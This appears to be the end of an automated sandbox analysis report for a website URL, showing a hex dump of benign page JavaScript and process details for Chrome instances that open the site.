                                                                                                                                                                                                                        2025-01-10 13:53:15 UTC1390INData Raw: 6e 73 74 20 70 65 3d 7b 5b 52 2e 43 45 4e 54 45 52 5d 3a 22 63 65 6e 74 65 72 22 2c 5b 52 2e 54 4f 50 5d 3a 22 74 6f 70 22 2c 5b 52 2e 54 4f 50 5f 4c 45 46 54 5d 3a 22 74 6f 70 20 6c 65 66 74 22 2c 5b 52 2e 54 4f 50 5f 52 49 47 48 54 5d 3a 22 74 6f 70 20 72 69 67 68 74 22 2c 5b 52 2e 42 4f 54 54 4f 4d 5d 3a 22 62 6f 74 74 6f 6d 22 2c 5b 52 2e 42 4f 54 54 4f 4d 5f 4c 45 46 54 5d 3a 22 62 6f 74 74 6f 6d 20 6c 65 66 74 22 2c 5b 52 2e 42 4f 54 54 4f 4d 5f 52 49 47 48 54 5d 3a 22 62 6f 74 74 6f 6d 20 72 69 67 68 74 22 2c 5b 52 2e 4c 45 46 54 5d 3a 22 6c 65 66 74 22 2c 5b 52 2e 52 49 47 48 54 5d 3a 22 72 69 67 68 74 22 7d 2c 66 65 3d 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 2c 74 6f 70 3a 22 61 75 74 6f 22 2c 72 69 67 68 74 3a 22 61 75 74 6f
                                                                                                                                                                                                                        Data Ascii: nst pe={[R.CENTER]:"center",[R.TOP]:"top",[R.TOP_LEFT]:"top left",[R.TOP_RIGHT]:"top right",[R.BOTTOM]:"bottom",[R.BOTTOM_LEFT]:"bottom left",[R.BOTTOM_RIGHT]:"bottom right",[R.LEFT]:"left",[R.RIGHT]:"right"},fe={position:"absolute",top:"auto",right:"auto


                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:08:52:23
                                                                                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                        Start time:08:52:27
                                                                                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1980,i,699547893311511455,8046579587966195972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                        Start time:08:52:33
                                                                                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://samantacatering.com/"
                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        No disassembly